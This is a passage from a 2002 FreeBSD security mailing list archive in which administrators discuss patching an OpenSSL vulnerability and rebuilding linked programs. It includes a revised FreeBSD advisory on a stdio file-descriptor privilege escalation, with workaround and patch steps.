"unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 11:17:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1845C37B400 for ; Tue, 30 Jul 2002 11:17:49 -0700 (PDT) Received: from mail.lambertfam.org (www.lambertfam.org [216.223.196.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0825643E65 for ; Tue, 30 Jul 2002 11:17:48 -0700 (PDT) (envelope-from lambert@lambertfam.org) Received: from localhost.localdomain (localhost [127.0.0.1]) by localhost.inch.com (Postfix) with ESMTP id 02AFF3515B for ; Tue, 30 Jul 2002 14:15:05 -0400 (EDT) Received: from laptop.lambertfam.org (unknown [10.1.0.2]) by mail.lambertfam.org (Postfix) with ESMTP id 79F6034DA1 for ; Tue, 30 Jul 2002 14:15:01 -0400 (EDT) Received: by laptop.lambertfam.org (Postfix, from userid 1000) id 523BE28B09; Tue, 30 Jul 2002 14:17:40 -0400 (EDT) Date: Tue, 30 Jul 2002 14:17:39 -0400 From: Scott Lambert To: freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: About the openssl hole Message-ID: <20020730181739.GA50219@laptop.lambertfam.org> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 07:52:54PM +0200, Dirk Meyer wrote: > Geir RÜness wrote: > > > But as many know, the port of openssl will > > not completly replace the core open ssl. > > (You could see this if you build mod_ssl) > > apache13-modssl will see and use an installed > port of openssl in /usr/local But if you install the openssl port with -DOPENSSL_OVERWRITE_BASE, the ports should simply see the "base" install of openssl and use it that way, no? Do openssl using programs need to be recompiled for library changes between OpenSSL 0.9.6a and OpenSSL 0.9.6d? ssh, sendmail, postfix, stunnel, various pop3 and imap daemons, apache, ....? -- Scott Lambert KC5MLE Unix SysAdmin lambert@lambertfam.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 11:21:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 978CB37B405; Tue, 30 Jul 2002 11:21:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0BC2A43E5E; Tue, 30 Jul 2002 11:21:05 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6UIL4JU034043; Tue, 30 Jul 2002 11:21:04 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6UIL4w2034041; Tue, 30 Jul 2002 11:21:04 -0700 (PDT) Date: Tue, 30 Jul 2002 11:21:04 -0700 (PDT) Message-Id: <200207301821.g6UIL4w2034041@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED] Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:23.stdio Security Advisory The FreeBSD Project Topic: insecure handling of stdio file descriptors Category: core Module: kernel Announced: 2002-04-22 Credits: Joost Pol , Georgi Guninski Affects: All releases of FreeBSD up to and including 4.6-RELEASE 4.6-STABLE prior to the correction date Corrected: 2002-07-30 15:40:46 UTC (RELENG_4) 2002-07-30 15:42:11 UTC (RELENG_4_6) 2002-07-30 15:42:46 UTC (RELENG_4_5) 2002-07-30 15:43:17 UTC (RELENG_4_4) FreeBSD only: NO 0. Revision History v1.0 2002-04-22 Initial release v1.1 2002-04-23 Patch and revision numbers updated v1.2 2002-07-29 procfs issue; updated patch I. Background By convention, POSIX systems associate file descriptors 0, 1, and 2 with standard input, standard output, and standard error, respectively. Almost all applications give these stdio file descriptors special significance, such as writing error messages to standard error (file descriptor 2). In new processes, all file descriptors are duplicated from the parent process. Unless these descriptors are marked close-on-exec, they retain their state during an exec. All POSIX systems assign file descriptors in sequential order, starting with the lowest unused file descriptor. For example, if a newly exec'd process has file descriptors 0 and 1 open, but file descriptor 2 closed, and then opens a file, the new file descriptor is guaranteed to be 2 (standard error). II. Problem Description Some programs are set-user-id or set-group-id, and therefore run with increased privileges. If such a program is started with some of the stdio file descriptors closed, the program may open a file and inadvertently associate it with standard input, standard output, or standard error. The program may then read data from or write data to the file inappropriately. If the file is one that the user would normally not have privileges to open, this may result in an opportunity for privilege escalation. The original correction for this problem (corresponding to the first revision of this advisory) contained an error. Systems using procfs or linprocfs could still be exploited. The dates for the original, incomplete correction were: Corrected: 2002-04-21 13:06:45 UTC (RELENG_4) 2002-04-21 13:08:57 UTC (RELENG_4_5) 2002-04-21 13:10:51 UTC (RELENG_4_4) III. Impact Local users may gain superuser privileges. It is known that the `keyinit' set-user-id program is exploitable using this method. There may be other programs that are exploitable. IV. Workaround [FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11] None. The set-user-id bit may be removed from `keyinit' using the following command, but note that there may be other programs that can be exploited. # chmod 0555 /usr/bin/keyinit [FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later, 4.6-RELEASE, and 4.6-STABLE] Unmount all instances of the procfs and linprocfs filesystems using the umount(8) command: # umount -f -a -t procfs # umount -f -a -t linprocfs V. Solution The kernel was modified to check file descriptors 0, 1, and 2 when starting a set-user-ID or set-group-ID executable. If any of these are not in use, they will be redirected to /dev/null. 1) Upgrade your vulnerable system to 4.6-STABLE; or to any of the RELENG_4_6 (4.6.1-RELEASE-p1), RELENG_4_5 (4.5-RELEASE-p10), or RELENG_4_4 (4.4-RELEASE-p17) security branches dated after the respective correction dates. 2) To patch your present system: a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2 # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.v1.2.asc [FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later, 4.6-RELEASE, and 4.6-STABLE] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2 # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio2.patch.v1.2.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- sys/sys/filedesc.h RELENG_4 1.19.2.4 RELENG_4_6 1.19.2.4 RELENG_4_5 1.19.2.3.6.1 RELENG_4_4 1.19.2.3.4.1 sys/kern/kern_exec.c RELENG_4 1.107.2.15 RELENG_4_6 1.107.2.14.2.1 RELENG_4_5 1.107.2.13.2.2 RELENG_4_4 1.107.2.8.2.3 sys/kern/kern_descrip.c RELENG_4 1.81.2.12 RELENG_4_6 1.81.2.14 RELENG_4_5 1.81.2.9.2.2 RELENG_4_4 1.81.2.8.2.2 sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.6 RELENG_4_5 1.44.2.20.2.11 RELENG_4_4 1.44.2.17.2.16 - ------------------------------------------------------------------------- VII. References PINE-CERT-20020401 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPUbXw1UuHi5z0oilAQFgKQP/eOnmHorw/4NVEAEKTQp4+X7Px9p1wUGq 6OcLH5GuTbbwexd7KbCjbjzNZF7zgz1Qph2v7NQXb+W/ZaW2hEgcoURXkBomVxjl 61oXu72P35bmgNo7GQ794v/WDHd8FymtBv0kyY/vuZqg6l99tTuwi2ryV1ZszVrh w21lAbhkyQo= =YGVw -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12: 0:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 649D837B400 for ; Tue, 30 Jul 2002 12:00:12 -0700 (PDT) Received: from iota.root-servers.ch (iota.root-servers.ch [193.41.193.195]) by mx1.FreeBSD.org (Postfix) with SMTP id 0BBFC43E42 for ; Tue, 30 Jul 2002 12:00:11 -0700 (PDT) (envelope-from gaml@buz.ch) Received: (qmail 14791 invoked from network); 30 Jul 2002 19:00:07 -0000 Received: from dclient217-162-128-229.hispeed.ch (HELO gaxp1800) (217.162.128.229) by 0 with SMTP; 30 Jul 2002 19:00:07 -0000 Date: Tue, 30 Jul 2002 21:00:32 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.60q) Educational Reply-To: Gabriel Ambuehl X-Priority: 3 (Normal) Message-ID: <121122473609.20020730210032@buz.ch> To: freebsd-security@freebsd.org Subject: OpenSSH not using libssl? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I'm somewhat confused now. I wanted to install the openssl port which worked out fine and tried to figure out what I need to do to get openssh (which makes the whole thing a disaster) to use the new lib so I went on and did: # ldd /usr/sbin/sshd /usr/sbin/sshd: libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000) libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000) libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000) libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000) libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000) libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000) libz.so.2 => /usr/lib/libz.so.2 (0x281a2000) libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000) libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000) libc.so.4 => /usr/lib/libc.so.4 (0x281c1000) Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't libssl show up (with stunnel, for one, it does, BTW stunnel will automatically use /usr/local/lib/libssl upon a recompile)? Guess I better wait until the CVS contains a fix for the base tree... regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:15:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 44D4437B400 for ; Tue, 30 Jul 2002 12:15:11 -0700 (PDT) Received: from goofy.epylon.com (216-203-220-162.customer.algx.net [216.203.220.162]) by mx1.FreeBSD.org (Postfix) with ESMTP id E633443E3B for ; Tue, 30 Jul 2002 12:15:06 -0700 (PDT) (envelope-from jdicioccio@epylon.com) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id <3MAKPM7F>; Tue, 30 Jul 2002 12:15:06 -0700 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02FFF635@goofy.epylon.lan> From: "DiCioccio, Jason" To: 'Gabriel Ambuehl' , freebsd-security@freebsd.org Subject: RE: OpenSSH not using libssl? Date: Tue, 30 Jul 2002 12:15:05 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 libcrypto is part of openssl.. Unless the vulnerability was only in libssl? I don't think so though.. Cheers, - -JD- - -----Original Message----- From: Gabriel Ambuehl [mailto:gaml@buz.ch] Sent: Tuesday, July 30, 2002 12:01 PM To: freebsd-security@freebsd.org Subject: OpenSSH not using libssl? Hi, I'm somewhat confused now. I wanted to install the openssl port which worked out fine and tried to figure out what I need to do to get openssh (which makes the whole thing a disaster) to use the new lib so I went on and did: # ldd /usr/sbin/sshd /usr/sbin/sshd: libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000) libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000) libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000) libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000) libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000) libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000) libz.so.2 => /usr/lib/libz.so.2 (0x281a2000) libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000) libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000) libc.so.4 => /usr/lib/libc.so.4 (0x281c1000) Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't libssl show up (with stunnel, for one, it does, BTW stunnel will automatically use /usr/local/lib/libssl upon a recompile)? Guess I better wait until the CVS contains a fix for the base tree... regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBPUbl2DKUHizV76d/EQL1fwCffSU3eKgiVnbioVLsBBZZ79T+P1MAn3SN v49doiJnJIewX5Kgp+X/Vqwp =zMHw -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:16: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9BA6537B4C6 for ; Tue, 30 Jul 2002 12:16:03 -0700 (PDT) Received: from silver.teardrop.org (silver.teardrop.org [64.61.57.67]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3737043E65 for ; Tue, 30 Jul 2002 12:16:03 -0700 (PDT) (envelope-from snow@teardrop.org) Received: by silver.teardrop.org (Postfix, from userid 100) id 32FBE26DD5; Tue, 30 Jul 2002 15:15:57 -0400 (EDT) Date: Tue, 30 Jul 2002 15:15:56 -0400 From: James Snow To: Gabriel Ambuehl Cc: freebsd-security@freebsd.org Subject: Re: OpenSSH not using libssl? Message-ID: <20020730151556.A44974@teardrop.org> References: <121122473609.20020730210032@buz.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <121122473609.20020730210032@buz.ch>; from gaml@buz.ch on Tue, Jul 30, 2002 at 09:00:32PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 09:00:32PM +0200, Gabriel Ambuehl wrote: > # ldd /usr/sbin/sshd > /usr/sbin/sshd: ... > libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000) ... > Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't > libssl show up (with stunnel, for one, it does, BTW stunnel will > automatically use /usr/local/lib/libssl upon a recompile)? Guess I > better wait until the CVS contains a fix for the base tree... I scratched my head at this initially as well. But if you build OpenSSL from source, you'll see that it includes libcrypto. It's not as obvious in the FreeBSD /usr/src tree because of the way that things are broken out. (At least, it wasn't obvious to me; I may just be clueless) Since OpenSSH is the only daemon I run that uses OpenSSL, I just ran the patch from the original advisory in /usr/src/crypto/openssl, rebuilt /usr/src/secure/lib/libcrypto, and bounced sshd. This may not have been exactly the correct thing to do, but it seems to have worked out for me. -Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:16:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EBB5837B400 for ; Tue, 30 Jul 2002 12:16:42 -0700 (PDT) Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id D1DDC43E31 for ; Tue, 30 Jul 2002 12:16:41 -0700 (PDT) (envelope-from zvezdan@CS.WM.EDU) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id g6UJEMN13588 for ; Tue, 30 Jul 2002 15:14:22 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id g6UJGeJ31562 for freebsd-security@FreeBSD.ORG; Tue, 30 Jul 2002 15:16:40 -0400 Date: Tue, 30 Jul 2002 15:16:40 -0400 From: Zvezdan Petkovic To: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH not using libssl? Message-ID: <20020730151640.A31553@corona.cs.wm.edu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <121122473609.20020730210032@buz.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <121122473609.20020730210032@buz.ch>; from gaml@buz.ch on Tue, Jul 30, 2002 at 09:00:32PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jul 30, 2002 at 09:00:32PM +0200, Gabriel Ambuehl wrote: > Hi, > I'm somewhat confused now. I wanted to install the openssl port which > worked out fine and tried to figure out what I need to do to get > openssh (which makes the whole thing a disaster) to use the new lib so > I went on and did: > # ldd /usr/sbin/sshd > /usr/sbin/sshd: > libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000) > libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000) > libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000) > libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000) See this line? >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> > libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000) >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> This is OpenSSL library! > libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000) > libz.so.2 => /usr/lib/libz.so.2 (0x281a2000) > libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000) > libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000) > libc.so.4 => /usr/lib/libc.so.4 (0x281c1000) > > Now what's up here? Isn't OpenSSH based on OpenSSL? If so, why doesn't > libssl show up (with stunnel, for one, it does, BTW stunnel will > automatically use /usr/local/lib/libssl upon a recompile)? Guess I > better wait until the CVS contains a fix for the base tree... > -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:24:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7D1BA37B400 for ; Tue, 30 Jul 2002 12:24:29 -0700 (PDT) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id 4557043E65 for ; Tue, 30 Jul 2002 12:24:28 -0700 (PDT) (envelope-from michaelnottebrock@gmx.net) Received: (qmail 13838 invoked by uid 0); 30 Jul 2002 19:24:26 -0000 Received: from pd9003286.dip.t-dialin.net (HELO gmx.net) (217.0.50.134) by mail.gmx.net (mp011-rz3) with SMTP; 30 Jul 2002 19:24:26 -0000 Message-ID: <3D46E7ED.1040006@gmx.net> Date: Tue, 30 Jul 2002 21:24:29 +0200 From: Michael Nottebrock User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.0rc2) Gecko/20020513 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH not using libssl? References: <121122473609.20020730210032@buz.ch> X-Enigmail-Version: 0.61.1.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig7789364C55CCD822E38AA594" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following is an OpenPGP/MIME signed message created by Enigmail/Mozilla, following RFC 2440 and RFC 2015 --------------enig7789364C55CCD822E38AA594 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Gabriel Ambuehl wrote: > Hi, > I'm somewhat confused now. I wanted to install the openssl port which > worked out fine and tried to figure out what I need to do to get > openssh (which makes the whole thing a disaster) to use the new lib so > I went on and did: > # ldd /usr/sbin/sshd > /usr/sbin/sshd: > libopie.so.2 => /usr/lib/libopie.so.2 (0x28086000) > libmd.so.2 => /usr/lib/libmd.so.2 (0x2808f000) > libssh.so.2 => /usr/lib/libssh.so.2 (0x28098000) > libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280c9000) > libcrypto.so.2 => /usr/lib/libcrypto.so.2 (0x280e2000) > libutil.so.3 => /usr/lib/libutil.so.3 (0x28199000) > libz.so.2 => /usr/lib/libz.so.2 (0x281a2000) > libwrap.so.3 => /usr/lib/libwrap.so.3 (0x281af000) > libpam.so.1 => /usr/lib/libpam.so.1 (0x281b7000) > libc.so.4 => /usr/lib/libc.so.4 (0x281c1000) > > Now what's up here? Isn't OpenSSH based on OpenSSL? It uses libcrypto, but it shouldn't be vulnerable. -- Michael Nottebrock "The circumstance ends uglily in the cruel result." - Babelfish --------------enig7789364C55CCD822E38AA594 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE9RuftXhc68WspdLARAuKaAJ41F79l80Q2+/lmssxpGG8KTfEiAwCeOXLq iRlIoYzMvQ+p0Cvu2tA4nlQ= =siKk -----END PGP SIGNATURE----- --------------enig7789364C55CCD822E38AA594-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 12:55:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ADF7E37B400 for ; Tue, 30 Jul 2002 12:55:38 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id CCD2043E42 for ; Tue, 30 Jul 2002 12:55:36 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6UJt95H026146 for ; Tue, 30 Jul 2002 21:55:11 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6UJt8b8026106 for ; Tue, 30 Jul 2002 21:55:08 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Re[2]: About the openssl hole Date: Tue, 30 Jul 2002 21:49:12 +0200 X-Mailer: Dinoex 1.79 References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <20020730181739.GA50219@laptop.lambertfam.org> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-Accept-Language: de,en X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-No-Archive: yes X-ZC-VIA: 20020730000000S+2@dinoex.sub.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Scott Lambert wrote: > But if you install the openssl port with -DOPENSSL_OVERWRITE_BASE, the > ports should simply see the "base" install of openssl and use it that > way, no? there is a version bump. > Do openssl using programs need to be recompiled for library changes > between OpenSSL 0.9.6a and OpenSSL 0.9.6d? ssh, sendmail, postfix, > stunnel, various pop3 and imap daemons, apache, ....? Yes you need to rebuild them all, to link against the new libssl.so.3 libcryptro.so.3 or apply the patch from the advisory in the base system. This will get you a modified libssl.so.2 libcryptro.so.2 kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 13: 4:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D421A37B400 for ; Tue, 30 Jul 2002 13:04:50 -0700 (PDT) Received: from web11607.mail.yahoo.com (web11607.mail.yahoo.com [216.136.172.59]) by mx1.FreeBSD.org (Postfix) with SMTP id 64C1F43E4A for ; Tue, 30 Jul 2002 13:04:50 -0700 (PDT) (envelope-from holtor@yahoo.com) Message-ID: <20020730195807.28306.qmail@web11607.mail.yahoo.com> Received: from [24.191.164.44] by web11607.mail.yahoo.com via HTTP; Tue, 30 Jul 2002 12:58:07 PDT Date: Tue, 30 Jul 2002 12:58:07 -0700 (PDT) From: Holt Grendal Subject: Fixing OpenSSL Properly To: security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org While we wait for the base openssl version to be upgraded to 0.9.6e (precisely why I hate having all this stuff in the base system!) whats the proper way to patch our systems? I figure: cd /usr/ports/security/openssl make OPENSSL_OVERWRITE_BASE=YES install Then Rebuild libssh, mod_ssl, and anything else along with restarting sshd, apache and anything else? Will this all work fine and dandy? Holt __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 30 14:18:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AD86537B400 for ; Tue, 30 Jul 2002 14:18:09 -0700 (PDT) Received: from router.darlow.co.uk (pc2-bigg2-0-cust101.ltn.cable.ntl.com [213.107.35.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id B3E7C43E4A for ; Tue, 30 Jul 2002 14:18:08 -0700 (PDT) (envelope-from neil@darlow.co.uk) Received: from there (IDENT:1000@ideal.darlow.co.uk [192.168.0.2]) by router.darlow.co.uk (8.12.3/8.12.3) with SMTP id g6ULI6q5015864 for ; Tue, 30 Jul 2002 22:18:07 +0100 (BST) (envelope-from neil@darlow.co.uk) Message-Id: <200207302118.g6ULI6q5015864@router.darlow.co.uk> Content-Type: text/plain; charset="iso-8859-1" From: Neil Darlow To: freebsd-security@freebsd.org Subject: make buildworld after openssl/openssh-overwrite-base Date: Tue, 30 Jul 2002 22:18:03 +0100 X-Mailer: KMail [version 1.3.2] MIME-Version: 1.0 